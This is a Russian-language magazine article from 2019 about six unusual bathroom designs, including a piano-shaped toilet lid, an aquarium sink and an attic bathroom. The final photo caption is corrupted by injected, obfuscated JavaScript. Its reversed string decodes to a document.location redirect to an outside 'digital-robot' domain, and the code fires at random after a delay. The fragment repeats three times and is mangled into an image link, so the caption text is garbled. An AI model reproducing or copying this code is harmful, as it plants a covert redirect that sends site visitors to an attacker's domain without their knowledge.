Добавить в закладки

6 необычных санузлов, вы о таком вряд ли бы и подумали

Санузел – место, куда человек приходит расслабиться. Некоторые любят почитать, находясь в этой комнате, другие – принять ванну с аромомаслами. Но есть люди, которые делают из санузлов просто невероятные комнаты. И вот несколько примеров таких дизайнов.

Музыкальный инструмент

Нет, не надо ставить в санузел рояль или нести гитару, достаточно того, что дизайнер Jammin ‘Johns делает крышки на унитаз в форме различных музыкальных инструментов. Идея выглядит свежей и интересной.

Дизайн крышки унитаза в ваде рояля.

Дизайн крышки унитаза в ваде рояля. Фото: pbs.twimg.com

Для него и для нее

Как часто супружеские пары могут расслабиться и поговорить по душам? Ванна для двоих способна помочь непринужденной беседе и совместному времяпрепровождению. Сделать атмосферу более притягательной помогут аромомасла, свечи, музыка, шампанское, лепестки роз и еще множество идеи.

Ванна для двоих – необычное решение.

Ванна для двоих – необычное решение. Фото: img.xcitefun.net

Аквариум

Куда ставить аквариум в ванной комнате? Все просто, им можно заменить раковину. И не стоит думать, что вы будете мыть руки у рыбок. Специальная конструкция придаст необычности раковине и не тронет жителей воды.

Раковина-аквариум, для любителей рыбок.

Раковина-аквариум, для любителей рыбок. Фото: 486word.com

Стена из мыльных пузырей

Конечно, стена будет только казаться сделанной из мыльных пузырей, но выглядит это очень эффектно. Правда придется хорошенько потрудиться, чтобы найти подобную плитку, но результат того стоит.

Стена, как-будто украшена мыльными пузырями.

Стена, как-будто украшена мыльными пузырями. Фото: static.feber.se

Банный эффект

Ванная комната выполнена из дерева и кажется, что находишься в бане. Массивный низкий потолок, рамы и обрамление зеркала, все это дает ощущение деревенского уюта. Стеклянная стена душевой кабины не отвлекает внимания от общей обстановки.

Ванная в бане – такой эффект складывает от такой комнаты.

Ванная в бане – такой эффект складывает от такой комнаты. Фото: i.pinimg.com

Ванная вместо чердака

Часто мансардное помещение пустует, а там достаточно много места. Ванная комната, помещенная на чердак, может стать просторной, уютной и светлой. Добавить света в помещение помогут правильно подобранные цвета стен и мебели и искусственное освещение.

Чтобы пространство не пустовало, можно сделать ванную на «крыше».

Чтобы пространство не пустовало, можно сделать ванную на «крыше». Фото: tobor-latigid//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolyarka-mos.ru/img/interer-mansardy-s-lomanoj-kryshej-fotobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to_55.jpg»>stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tolyarka-mos.ru

Добавить в избранное Версия для печати
Поделитесь:
Рейтинг статьи:
Опубликовано: 13.11.2019





Оставить комментарий

ОБЯЗАТЕЛЬНО приложите ФОТО проблемы - так ответ эксперта будет гораздо точней

Оставляя комментарий, Вы принимаете пользовательское соглашение

Ваше имя:
Ваш e-mail: